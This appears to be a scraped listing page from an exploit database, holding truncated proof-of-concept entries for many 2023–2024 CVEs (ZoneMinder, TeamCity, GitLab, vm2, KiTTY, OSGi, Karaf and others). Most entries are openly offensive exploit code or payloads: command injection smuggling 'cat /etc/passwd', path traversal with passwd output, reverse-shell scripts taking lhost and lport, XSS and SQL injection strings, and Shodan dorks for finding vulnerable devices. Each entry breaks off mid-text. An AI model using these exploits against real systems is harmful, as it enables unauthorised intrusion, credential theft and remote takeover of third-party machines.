?day POC 漏洞数据库

import re import requests from bs4 import BeautifulSoup import argparse import base64 # Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots # Date: 12 December 2023 # Discovered by : @Unblvr1 # Exploit Author: Ravindu Wickramasinghe (@rvizx9) # Vendor Homepage: https://zoneminder.com/ # Software Link: https://github.com/ZoneMinder/zoneminder # Version: prior to 1.36.33 and 1.37.33 # Tested on: Arch Linux, Kali Linux # CVE : CVE-2023-26035 # Github Link : https://github.com/rvizx/CVE-2023-26035 class ZoneMinderExploit: def __init__(self, target_uri): self.target_uri = target_uri self.csrf_magic = None def fetch_csrf_token(self): p…

# Exploit Title: TYPO3 11.5.24 Path Traversal Vulnerability (Authenticated) # Date: Apr 9, 2023 # Exploit Author: Saeed reza Zamanian # Software Link: https://get.typo3.org/release-notes/11.5.24 # Version: 11.5.24 # Tested on: Kali 2022.3 # CVE : CVE-2023-30451 In TYPO3 11.5.24, the filelist component allows attackers (with access to the administrator panel), to read arbitrary files by utilizing a directory traversal via the baseuri field, This is demonstrated through : POST /typo3/record/edit with ../../../ and the parameter data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF]. ----------------------------------------------------- To exploit this vulnerabi…

## Title: WEBIGniter v28.7.23 XSS ## Author: RedTeamer IT Security, Mesut Cetin ## Date: 09/04/2023 ## Vendor: https://webigniter.net/ ## Software: https://webigniter.net/demo ## Reference: https://portswigger.net/web-security/cross-site-scripting/stored ## Description: During the user creation process, the 'your_name' parameter fails to adequately validate user input, rendering the system vulnerable to reflected cross-site scripting (XSS) attacks. ## PoC To exploit this vulnerability, an attacker can inject malicious JavaScript code into the "your_name" parameter under https://webigniter.net/create-account during the user creation process. This code, when embedded with…

/* # Exploit Title: vm2 Sandbox Escape vulnerability # Date: 23/12/2023 # Exploit Author: Calil Khalil & Adriel Mc Roberts # Vendor Homepage: https://github.com/patriksimek/vm2 # Software Link: https://github.com/patriksimek/vm2 # Version: vm2 <= 3.9.19 # Tested on: Ubuntu 22.04 # CVE : CVE-2023-37466 */ const { VM } = require("vm2"); const vm = new VM(); const command = 'pwd'; // Change to the desired command const code = ` async function fn() { (function stack() { new Error().stack; stack(); })(); } try { const handler = { getPrototypeOf(target) { (function stack() { new Error().stack; …

Exploit Title: WordPress File Upload < 4.23.3 Stored XSS (CVE 2023-4811) Date: 18 December 2023 Exploit Author: Faiyaz Ahmad Vendor Homepage: https://wordpress.com/ Version: 4.23.3 CVE : CVE 2023-4811 Proof Of Concept: 1. Login to the wordpress account 2. Add the following shortcode to a post in "File Upload Plugin": [wordpress_file_upload redirect="true" redirectlink="*javascript:alert(1)*"] 3. Upload any file on the resulting post. 4. After the upload completes, you will see the XSS alert in the browser.

# Exploit Title: UPS Network Management Card 4 - Path Traversal # Google Dork: inurl:nmc inurl:logon.htm # Date: 2023-12-19 # Exploit Author: Víctor García # Vendor Homepage: https://www.apc.com/ # Version: 4 # Tested on: Kali Linux # CVE: N/A # PoC: curl -k https://10.10.10.10/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd root:x:0:0:root:/home/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:…

# Exploit Title: Nokia BMC Log Scanner Remote Code Execution # Google Dork: N/A # Date: November 29, 2023 # Exploit Author: Carlos Andres Gonzalez, Matthew Gregory # Vendor Homepage: https://www.nokia.com/ # Software Link: N/A # Version: 13 # Tested on: Linux # CVE : CVE-2022-45899 Description The BMC Log Scanner web application, available on several hosts, is vulnerable to command injection attacks, allowing for unauthenticated remote code execution. This vulnerability is especially significant because this service runs as root. Steps to Reproduce: In the Search Pattern field, type: ;";command Replacing the word "command" above with any Linux command. Root access can…

# Exploit Title: LaborOfficeFree 19.10 MySQL Root Password Calculator - CVE-2024-1346 # Google Dork: N/A # Date: 09/02/2023 # Exploit Author: Peter Gabaldon - https://pgj11.com/ # Vendor Homepage: https://www.laborofficefree.com/ # Software Link: https://www.laborofficefree.com/#plans # Version: 19.10 # Tested on: Windows 10 # CVE : CVE-2024-1346 # Description: LaborOfficeFree installs a MySQL instance that runs as SYSTEM and calculates the MySQL root password based on two constants. Each time the program needs to connect to MySQL as root, it employs the reverse algorithm to calculate the root password. This issue has been tested on version 19.10 exclusively, but allegedl…

#!/usr/bin/python # Exploit Title: [Karaf v4.4.3 Console RCE] # Date: [2023-08-07] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-karaf-exploits.git] # Vendor Homepage: [https://karaf.apache.org] # Software Link: [https://karaf.apache.org/download.html] # Version: [4.4.3] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Example: # python exploit.py --rhost=192.168.0.133 --rport=1337 \ # --lhost=192.168.0.100 --lport=4444 \ # --creds=karaf:karaf """ Th…

# Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated) # Exploit Author: tmrswrr # Date: 12/05/2023 # Vendor: https://wintercms.com/ # Software Link: https://github.com/wintercms/winter/releases/v1.2.2 # Vulnerable Version(s): 1.2.2 #Tested : https://www.softaculous.com/demos/WinterCMS 1 ) Login with admin cred and click CMS > Pages field > Plugin components > https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup 2 ) Write SSTI payload : {{7*7}} 3 ) Save it , Click Priview : https://demos6.demo.com/WinterCMS/demo/plugins 4 ) You will be see result : 49 Payload : {{ dump() }} Result…

# Exploit Title: KiTTY 0.76.1.13 - Command Injection # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: CVE-2024-23749 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler # # [*] Payload Handl…

# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: CVE-2024-25004 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > to_handler …

# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: 2024-25003 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > to_handler …

# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset # Exploit Author: Sebastian Kriesten (0xB455) # Twitter: https://twitter.com/0xB455 # Date: 2024-01-12 # Vendor Homepage: gitlab.com # Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/ # Version: <16.7.2, <16.6.4, <16.5.6 # CVE: CVE-2023-7028 Proof of Concept: user[email][][email protected]&user[email][][email protected]

#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE) #- Shodan Dork: http.html_hash:-1402735717 #- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif" #- Exploit Author: ByteHunter #- Email: [email protected] #- Version: PSG-5124(LINK SOFTWARE RELEASE:26293) #- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293) import http.client import argparse def send_request(ip, port, command): headers = { "Host": f"{ip}:{port}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,ima…

#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE) #- Shodan Dork: http.title:'Vitogate 300' #- Exploit Author: ByteHunter #- Email: [email protected] #- Version: versions up to 2.1.3.0 #- Tested on: 2.1.1.0 #- CVE : CVE-2023-5702 & CVE-2023-5222 import argparse import requests def banner(): banner = """ ╔═══════════════════════════════════╗ CVE-2023-5702 Vitogate 300 RCE Author: ByteHunter ╚═══════════════════════════════════╝ """ print(banner) def send_post_request(target_ip, command, target_port): payload = { "method": "put", "form": "for…

#- Exploit Title: SolarView Compact 6.00 - Command Injection #- Shodan Dork: http.html:"solarview compact" #- Exploit Author: ByteHunter #- Email: [email protected] #- Version: 6.00 #- Tested on: 6.00 #- CVE : CVE-2023-23333 import argparse import requests def vuln_check(ip_address, port): url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip" response = requests.get(url) if response.status_code == 200: output = response.text if "root" in output: print("Vulnerability detected: Command Injection possible.") print(f"passwd file content:\n{response.text}"…

#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE) #- Shodan Dork: http.title:PM43 , PM43 #- Exploit Author: ByteHunter #- Email: [email protected] #- Frimware Version: versions prior to P10.19.050004 #- Tested on: P10.17.019667 #- CVE : CVE-2023-3710 import requests import argparse BLUE = '\033[94m' YELLOW = '\033[93m' RESET = '\033[0m' def banner(): banner = """ ╔════════════════════════════════════════════════╗ CVE-2023-3710 Command Injection in Honeywell PM43 Printers Author: ByteHunter ╚════════════════════════════════════════════════╝ """ print(YELLOW + banner + RESET) def…

#- Exploit Title: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE) #- Shodan Dork: http.title:TeamCity , http.favicon.hash:-1944119648 #- Exploit Author: ByteHunter #- Vendor: JetBrains #- Email: [email protected] #- vendor: JetBrains #- Version: versions before 2023.05.4 #- Tested on: 2023.05.3 #- CVE : CVE-2023-42793 import requests import argparse import re import random import string import subprocess banner = """ ===================================================== * CVE-2023-42793 * * TeamCity Admin Account Creation * * …

Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting Date: 06-Oct-2023 Exploit Author: Shahzaib Ali Khan Vendor Homepage: https://snipeitapp.com Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1 Version: 6.2.1 Tested on: Windows 11 22H2 and Ubuntu 20.04 CVE: CVE-2023-5452 Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting (XSS) feature that allows attackers to execute JavaScript commands. The location endpoint was vulnerable. Steps to Reproduce: 1. Login as a standard user [non-admin] > Asset page > List All 2. Click to open any asset > Edit Asset 3. Create new location and add the payload: <script>alert(docu…

# Exploit Title: [VMware Cloud Director | Bypass identity verification] # Google Dork: [non] # Date: [12/06/2023] # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) # Version: [10.5] # CVE : [CVE-2023-34060] import requests import paramiko import subprocess import socket import argparse import threading # Define a function to check if a port is open def is_port_open(ip, port): # Create a socket object s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Set the timeout to 1 second s.settimeout(1) # Try to connect to the port try: s.connect((ip, port)) # The port is open return True except: …

# Exploit Title: [Cisco Firepower Management Center] # Google Dork: [non] # Date: [12/06/2023] # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) # Version: [6.2.3.18", "6.4.0.16", "6.6.7.1] # CVE : [CVE-2023-20048] import requests import json # set the variables for the URL, username, and password for the FMC web services interface fmc_url = "https://fmc.example.com" fmc_user = "admin" fmc_pass = "cisco123" # create a requests session to handle cookies and certificate verification session = requests.Session() session.verify = False # send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh tok…

#!/usr/bin/python # Exploit Title: [OSGi v3.7.2 Console RCE] # Date: [2023-07-28] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-osgi-exploits.git] # Vendor Homepage: [https://eclipse.dev/equinox] # Software Link: [https://archive.eclipse.org/equinox/] # Version: [3.7.2 and before] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Examples: # python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \ # --lport=4444 # # python exploit.py --rhost=localhost --rport=1337 --payload=…

+ **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1 + **Date:** 2023-26-12 + **Exploit Author:** Hamdi Sevben + **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/ + **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip + **Version:** 1.0 + **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53 + **CVE:** CVE-2023-7137 ## References: + **CVE-2023-7137:** https://vuldb.com/?id.249140 + https://www.cve.org/CVERecord?id=CVE-2023-7137 + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137 + https://nvd.nist.gov/vuln/detail/CVE-2023-7137 #…

#!/usr/bin/python # Exploit Title: [OSGi v3.8-3.18 Console RCE] # Date: [2023-07-28] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-osgi-exploits.git] # Vendor Homepage: [https://eclipse.dev/equinox] # Software Link: [https://archive.eclipse.org/equinox/] # Version: [3.8 - 3.18] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Example: # python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \ # --lport=4444 """ Thi…